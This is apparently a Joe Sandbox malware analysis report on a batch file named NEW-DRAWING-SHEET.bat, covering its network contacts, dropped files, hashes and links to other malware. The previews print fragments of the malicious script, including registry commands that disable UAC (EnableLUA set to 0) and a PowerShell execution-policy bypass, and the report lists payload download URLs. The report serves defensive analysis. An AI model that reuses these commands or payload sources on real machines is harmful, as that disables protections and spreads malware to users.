http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000004.00000002.1742423417.00000218DAFC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000011.00000002.2922057231.000001EB8E600000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.17.dr, qmgr.db.17.dr | false | | high
https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/7z2408-x64.exe& | NEW-DRAWING-SHEET.bat | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1742423417.00000218DBC16000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod.C: | edb.log.17.dr, qmgr.db.17.dr | false | | high
https://g.live.com/odclientsettings/ProdV2 | edb.log.17.dr, qmgr.db.17.dr | false | | high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr | false | | high
https://paste.fo | powershell.exe, 00000004.00000002.1742423417.00000218DAFC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DB9BC000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1763771377.00000218EA546000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763771377.00000218EA403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1742423417.00000218DBD60000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://paste.fo | powershell.exe, 00000004.00000002.1742423417.00000218DB9C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1742423417.00000218DA391000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://raw.githubuserc | NEW-DRAWING-SHEET.bat | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1742423417.00000218DA391000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000011.00000003.1822496548.000001EB8E422000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.dr | false | | high
https://oneget.org | powershell.exe, 00000004.00000002.1742423417.00000218DBA10000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
239.255.255.250 | unknown | Reserved | unknown | unknown | false
172.67.144.225 | paste.fo | United States | 13335 | CLOUDFLARENETUS | true
142.250.185.100 | www.google.com | United States | 15169 | GOOGLEUS | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false

IP
192.168.2.4
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582348
Start date and time: 2024-12-30 11:39:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 51
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: NEW-DRAWING-SHEET.bat
Detection: MAL
Classification: mal100.evad.winBAT@93/40@5/6
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 3
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.186.46, 64.233.166.84, 172.217.16.206, 84.201.210.36, 192.229.221.95, 172.217.18.110, 184.28.90.27, 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, e16604.g.akamaiedge.net, clients.l.google.com, prod.fs.microsoft.com.akadns.net
• Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:40:15 | API Interceptor | 118x Sleep call for process: powershell.exe modified
05:40:25 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
239.255.255.250 | http://i646972656374o6c6373o636f6dz.oszar.com/ | malicious | Unknown |
| securedoc_20241220T111852.html | malicious | Unknown |
| https://visa-pwr.com/ | malicious | Unknown |
| sysmonconfig.xml | malicious | Unknown |
| https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com | malicious | Unknown |
| https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6a | malicious | Unknown |
| https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6a | malicious | Unknown |
| http://stoss3.libooc.com | malicious | Unknown |
| PersonnelPolicies.pdf | malicious | KnowBe4, PDFPhish |
| EFT Payment_Transcript__Survitecgroup.html | malicious | Unknown |
185.199.111.133 | cr_asm2.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
| cr_asm_crypter.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
| cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
| BeginSync lnk.lnk | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | fxsound_setup.exe | malicious | Unknown | 185.199.109.133
| OiMp3TH.exe | malicious | LummaC | 185.199.108.133
| 8lOT1rXZp5.exe | malicious | RedLine | 185.199.111.133
| Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 185.199.108.133
| YYjRtxS70h.exe | malicious | Unknown | 185.199.109.133
| YYjRtxS70h.exe | malicious | Unknown | 185.199.110.133
| file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.199.110.133
| Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 185.199.110.133
| BigProject.exe | malicious | LummaC | 185.199.110.133
| Set-up!.exe | malicious | LummaC | 185.199.108.133
paste.fo | Bank Information Details.bat | malicious | LodaRAT, XRed | 104.21.28.76
| SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe | malicious | XWorm | 104.21.28.76
| confirmationcr.vbs | malicious | Redline Clipper | 104.21.70.240
| 9K25QyJ4hA.exe | malicious | Unknown | 104.21.70.240
| 9K25QyJ4hA.exe | malicious | Unknown | 104.21.70.240
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com | malicious | Unknown | 151.101.2.137
| star.ppc.elf | malicious | Mirai, Moobot | 167.83.165.108
| EFT Payment_Transcript__Survitecgroup.html | malicious | Unknown | 151.101.2.137
| installeasyassist.exe | malicious | Unknown | 151.101.65.21
| https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.html | malicious | Unknown | 151.101.129.44
| http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 151.101.194.137
| fxsound_setup.exe | malicious | Unknown | 185.199.109.133
| Hwacaj.exe | malicious | Darkbot | 151.101.66.137
| rpDOUhuBC5.exe | malicious | Credential Flusher | 151.101.129.91
| rpDOUhuBC5.exe | malicious | Credential Flusher | 151.101.1.91
CLOUDFLARENETUS | Jx6bD8nM4qW9sL3v.exe | malicious | Unknown | 162.159.128.233
| Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe | malicious | DBatLoader, FormBook | 188.114.97.3
| Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
| 6QLvb9i.exe | malicious | LummaC | 188.114.97.3
| http://i646972656374o6c6373o636f6dz.oszar.com/ | malicious | Unknown | 104.16.79.73
| securedoc_20241220T111852.html | malicious | Unknown | 104.17.25.14
| https://visa-pwr.com/ | malicious | Unknown | 104.18.28.104
| lumma.ps1 | malicious | LummaC | 104.21.72.190
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.144.225
| lumma.ps1 | malicious | LummaC | 172.67.144.225
| GPU-Z.exe | malicious | LummaC, DarkTortilla, LummaC Stealer | 172.67.144.225
| Winter.mp4.hta | malicious | LummaC | 172.67.144.225
| aYu936prD4.exe | malicious | Unknown | 172.67.144.225
| aYu936prD4.exe | malicious | Unknown | 172.67.144.225
| VegaStealer_v2.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 172.67.144.225
| SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | 172.67.144.225
| l0zocrLiVW.exe | malicious | LummaC | 172.67.144.225
                                                                                No context
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):1.3073835731521888
                                                                                Encrypted:false
                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvri:KooCEYhgYEL0In
                                                                                MD5:2CB11036E8188C3C64C13CED8996A22D
                                                                                SHA1:CFCC8503EC37F02CB9CE10B5BBEFA0F30D7A0A4F
                                                                                SHA-256:5F9384FA02A07192BD82BECB1B5ED8F4CC9AAC329A611C2CCB64640B7BF03C5A
                                                                                SHA-512:712108AEE0EFF166F3C5C0C002CDE6A9A9CBF27AE7FE62C4442206AD64C95FCC390C0B3BBB7FC30C67B8B4C7ADDB61EED7FC5B004EC286C58ECCE82239D2B317
                                                                                Malicious:false
                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8ebec10c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.4222029158049839
                                                                                Encrypted:false
                                                                                SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                                                                MD5:61BD69953F9ADBBFBB6410C5C6D988E9
                                                                                SHA1:6DE547391505EB6513F2A760B583AF204AC8C30C
                                                                                SHA-256:CAC343FF3CD752D29DFCC23E72AD23C5E0A728A5EC61C363AE6FB5D3AA969766
                                                                                SHA-512:0A6E7CC922FD5AC0F849A751F8B7671D340D32B1A46C17C4D283DF05306EC6ED6C9CE200784EF72DAD1B5D1B314CDF1AAAC742EDA664661BE5377163397C848A
                                                                                Malicious:false
                                                                                Preview:....... .......A.......X\...;...{......................0.!..........{A..(...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................3..(...|...................s..(...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.07710604338203877
                                                                                Encrypted:false
                                                                                SSDEEP:3:KyKYeLMejjn13a/z977llcVO/lnlZMxZNQl:KyKzLfj53q5FOewk
                                                                                MD5:C89541E9A8698A58C02351EBACEBFF46
                                                                                SHA1:E7DC3977A53F54133F36C5B6AEBA6E1C9F7B32B8
                                                                                SHA-256:8DFEE50382F3628E66D8F86341DDBD6CACE66B977BE59EDA0C9C60043604135F
                                                                                SHA-512:5A43E5DA9A021AF9D69EFBDE60EAD493CE8EB09FD8E42CC45B443ED9ABE9E92A28EBC1E6EDC2B1683975D2B9F8D03B1E61B3D29EF8E8722D1DFB4CCF3053961E
                                                                                Malicious:false
                                                                                Preview:.........................................;...{...(...|.......{A..............{A......{A..........{A].................s..(...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Preview:@...e...........................................................
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1674
                                                                                Entropy (8bit):5.289633803958584
                                                                                Encrypted:false
                                                                                SSDEEP:48:765ijMiUQnQ5IyQ0m3FHY4AJ4tppICkQ865C6H3QBjHQHuHU904:765QMiUQnQ5y1865v
                                                                                MD5:45A66AFA3B07B3143F0D0C3515898BAE
                                                                                SHA1:CC5BAF0C4D2FC0B034974786F20087E058915693
                                                                                SHA-256:8A8C558B5CB169E5D2967DC3E69CB26174BDD8D457903F074477EF1C555B4FB6
                                                                                SHA-512:04AEE35C068225EC8982FC273FD4E4E172CF336B26561D5B8C7CCF3FE972C485B962D01BDCFAB2A27FE456364114417DC3C44852D8431DEF9A04812E8008106F
                                                                                Malicious:true
                                                                                Preview:@echo off..setlocal ENABLEDELAYEDEXPANSION....:: ????? ??????? ?????? ?????..set "cmd_reg=reg.exe ADD"..set "policy_path=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"..set "reg_params=/t REG_DWORD /d 0 /f"..set "ps_cmd=PowerShell -Command"....:: ????? ???????? ?? ??? ????..if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit....:: ????? ????? ????????? ???????? ????????? ?????? ??????..!cmd_reg! !policy_path! /v EnableLUA !reg_params!..!cmd_reg! !policy_path! /v EnableInstallerDetection !reg_params!..!cmd_reg! !policy_path! /v EnableUIADesktopToggle !reg_params!..!cmd_reg! !policy_path! /v EnableVirtualization !reg_params!..!cmd_reg! !policy_path! /v EnableUwpStartupTasks !reg_params!..!cmd_reg! !policy_path! /v EnableSecureUIAPaths !reg_params!..!cmd_reg! !policy_path! /v EnableFullTrustStartupTasks !reg_params!..!cmd_reg! !policy_path! /v EnableCursorSuppression !reg_params!..!cmd_reg! !policy_path! /v DSCAutomationHostEnabled !reg_pa
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: Zip archive data, at least v4.5 to extract, compression method=deflate
Category: dropped
Size (bytes): 1259880
Entropy (8bit): 7.999849386830486
Encrypted: true
SSDEEP: 24576:u73epKSxTCIfisAvS4umgRFnYreIL5Caq5Ap7GUGOW2GyKoMaHt0ZMg+U:bKeWHvwPneeIL5Caq5AIuph6agZ
MD5: 9353CD481543E4FCF91E2C770FBCFEFB
SHA1: A29A232BC73842CB11D87DC906747A55CC9ED27D
SHA-256: 9C2AB47B11C7C94A4F2416030F6383B235BAF30770881BA91E7D6534610A5CD5
SHA-512: 827E1E0C0ED0B664B2232FC28444476A9F28F2DF0EBE4638D93C183684B9FCDAB26C26D5C1374146D8D50D13757408CEABC1CCFFB616913CB8CED08DC0D2D3A2
Malicious: false
Preview: PK..-.....'4~Y.7..............DOC.exe.....d.......8.............@..G.<.u&..h.V..4..+.q'=D|U[4B$...w<H..'............kDC.6.x.L-..}.\...A.[....V.P.R...i.q...JG.g..J.(].A...P-.....#..PT:%...4....o.U...F.t.d.v..xb..0..iZ4b.z.K.P...U..e..x.......&..:.Q.#.o..e...J.n.H......H.......%...3 .'Fg.......T..u...'5.{.:....@.OdD....q:;_d...2.....v...Z.p...7\....a1.T).........6.......o...[.....].hB9.n....>F.5..r?.3...KX.T.....t..|...u...2..z.....\....{..8`F....P....O;....`.ML.g ..gF.P.r...S............].t..L....E.g5..y|.....F.IZt..MG.5..(.....CLv...e..y8_6...c..z.cm..1...w.k.m...)a..z.X.+.>e$.CM..".......I......R1....*.l.\V_@.n.....ex...0E.D......c.A.,ys.Y....:........s.I.S.Lw/4........k$..L.l.^y....7y..J.....t...**B.;....}ph.y.8^dk^.1...]..@..._!-....5.UK...CM..E~m..v..LFmY.Utn..x.q...s..W....k........t..\...z..@...}..b..r..l.34#y..#...p"...|...=C.N6("p.........T........AY.......>:~...u.~..{......\..dpp...J....m1u......9....3I..SG....6.......]j...^

Process: C:\Windows\System32\svchost.exe
File Type: JSON data
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: Zip archive data, at least v4.5 to extract, compression method=deflate
Category: downloaded
Size (bytes): 1259880
Entropy (8bit): 7.999849386830486
Encrypted: true
SSDEEP: 24576:u73epKSxTCIfisAvS4umgRFnYreIL5Caq5Ap7GUGOW2GyKoMaHt0ZMg+U:bKeWHvwPneeIL5Caq5AIuph6agZ
MD5: 9353CD481543E4FCF91E2C770FBCFEFB
SHA1: A29A232BC73842CB11D87DC906747A55CC9ED27D
SHA-256: 9C2AB47B11C7C94A4F2416030F6383B235BAF30770881BA91E7D6534610A5CD5
SHA-512: 827E1E0C0ED0B664B2232FC28444476A9F28F2DF0EBE4638D93C183684B9FCDAB26C26D5C1374146D8D50D13757408CEABC1CCFFB616913CB8CED08DC0D2D3A2
Malicious: false
URL: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
Preview: PK..-.....'4~Y.7..............DOC.exe.....d.......8.............@..G.<.u&..h.V..4..+.q'=D|U[4B$...w<H..'............kDC.6.x.L-..}.\...A.[....V.P.R...i.q...JG.g..J.(].A...P-.....#..PT:%...4....o.U...F.t.d.v..xb..0..iZ4b.z.K.P...U..e..x.......&..:.Q.#.o..e...J.n.H......H.......%...3 .'Fg.......T..u...'5.{.:....@.OdD....q:;_d...2.....v...Z.p...7\....a1.T).........6.......o...[.....].hB9.n....>F.5..r?.3...KX.T.....t..|...u...2..z.....\....{..8`F....P....O;....`.ML.g ..gF.P.r...S............].t..L....E.g5..y|.....F.IZt..MG.5..(.....CLv...e..y8_6...c..z.cm..1...w.k.m...)a..z.X.+.>e$.CM..".......I......R1....*.l.\V_@.n.....ex...0E.D......c.A.,ys.Y....:........s.I.S.Lw/4........k$..L.l.^y....7y..J.....t...**B.;....}ph.y.8^dk^.1...]..@..._!-....5.UK...CM..E~m..v..LFmY.Utn..x.q...s..W....k........t..\...z..@...}..b..r..l.34#y..#...p"...|...=C.N6("p.........T........AY.......>:~...u.~..{......\..dpp...J....m1u......9....3I..SG....6.......]j...^

Process: C:\Program Files\7-Zip\7z.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 332
Entropy (8bit): 4.873129460973007
Encrypted: false
SSDEEP: 6:AMnM3vtFHcAxXF2SaiewdKaLgbWoJPXwdWGvovnbqxRoJPO:poVZRwsUmQ1o4GKqK2
MD5: E8D4AD29A7C238F46A289487E5856C30
SHA1: A9791EB90B91EB5809FD6B8EA930A12FE57EB991
SHA-256: 98901DE8E3E15697BF5FC6CBCAA14674B7B987CF619C1ED1E546B675DADB969F
SHA-512: C7165ED3AA98E62A6D03F237AF1C90CA15B76A5D98BD35383081156C77B52F4A44F9431BBB9C3DEDFCDD80D55D5D0C837F3A581F91394CBB284008F65F91BCC1
Malicious: false
Preview: ..7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan C:\Users\user\Downloads\. ...ERROR: The system cannot find the file specified...C:\Users\user\Downloads\DOC.zip........System ERROR:..The system cannot find the file specified...

Process: C:\Windows\System32\timeout.exe
File Type: ASCII text, with CRLF line terminators, with overstriking
Category: dropped
Size (bytes): 72
Entropy (8bit): 4.595990105158255
Encrypted: false
SSDEEP: 3:hYFYdKAR+mQRKVxLZdte6yn:hYFYGaNZ2zn
MD5: DE24BFC8AB7D50F50F54D2F76336D137
SHA1: 12984BA4960312EEED3EDD6582C4604EC4CBE129
SHA-256: CCEBF2DBA9DEB42102B5BE2E09799A160F2AD950713CAC9F02DDFBBE9BEA87FC
SHA-512: 2451EED90CD3C063497669F4D654285A0AA86F9869BB157A5F91E8877480C3446D32273C53FE0BC32BC662F775A26BD51493D698F19F739D1DB09836E1B551DA
Malicious: false
Preview: ..Waiting for 9 seconds, press a key to continue ....8.7.6.5.4.3.2.1.0..

File type: Unicode text, UTF-8 text, with very long lines (813), with CRLF line terminators
Entropy (8bit): 4.931837795281277
TrID:
• Affix file (4004/1) 100.00%
File name: NEW-DRAWING-SHEET.bat
File size: 42'315 bytes
MD5: 6b9cf24f2b691606642bd18bf2227a62
SHA1: 046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
SHA256: f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
SHA512: db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e
SSDEEP: 768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO
TLSH: 9A13B23CCD822FC6542CCA279F77910F70C7ECED0BDE1E956BAC3A168E8858D54A1816
File Content Preview: SET ..............................=cqaODusdKCNUQzlopGfiBgLMmwATtrHJeYIhxkXWVPjnZSFbRyvE..<# :batch script..@echo off..if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit..PowerShell -ExecutionPolicy Bypass -NoProfile -Wind
Icon Hash: 9686878b929a9886

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 11:40:14.832134008 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Dec 30, 2024 11:40:17.616072893 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:17.616110086 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:17.616183043 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:17.627028942 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:17.627048969 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:18.087074995 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:18.087217093 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:18.090718031 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:18.090732098 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:18.091029882 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:18.108732939 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:18.151375055 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:18.404381037 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:18.404422998 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:18.404495001 CET | 443 | 49730 | 172.67.144.225 | 192.168.2.4
Dec 30, 2024 11:40:18.404540062 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:18.404807091 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:18.408739090 CET | 49730 | 443 | 192.168.2.4 | 172.67.144.225
Dec 30, 2024 11:40:27.715401888 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:27.715441942 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:27.721191883 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:27.721810102 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:27.721822023 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.167521954 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.173255920 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:28.173309088 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.174412966 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
Dec 30, 2024 11:40:28.174952030 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:28.177402020 CET | 49731 | 443 | 192.168.2.4 | 185.199.111.133
Dec 30, 2024 11:40:28.177481890 CET | 443 | 49731 | 185.199.111.133 | 192.168.2.4
